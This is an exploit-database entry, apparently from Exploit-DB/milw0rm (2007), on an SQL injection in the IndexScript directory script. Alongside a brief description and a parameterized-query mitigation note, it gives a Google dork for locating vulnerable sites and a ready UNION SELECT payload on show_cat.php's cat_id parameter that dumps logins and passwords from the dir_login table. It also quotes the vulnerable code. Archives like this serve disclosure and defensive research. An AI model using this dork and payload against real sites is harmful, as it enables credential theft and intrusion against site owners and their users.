header-logo
Suggest Exploit
vendor:
IndexScript
by:
xssvgamer
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: IndexScript
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Blind SQL Injection in IndexScript

The exploit allows an attacker to perform a blind SQL injection attack on the IndexScript website. By manipulating the 'cat_id' parameter in the 'show_cat.php' page, the attacker can extract login credentials from the 'dir_login' table.

Mitigation:

To mitigate this vulnerability, the developer should use parameterized queries or prepared statements to sanitize user input and prevent SQL injection attacks.
Source

Exploit-DB raw data:

Site: http://indexscript.com
Found By: xssvgamer

Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in indexscript..

Vul Code:
"$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
 "cat_id=" . fnpreparesql($_GET['cat_id']);"

# milw0rm.com [2007-07-25]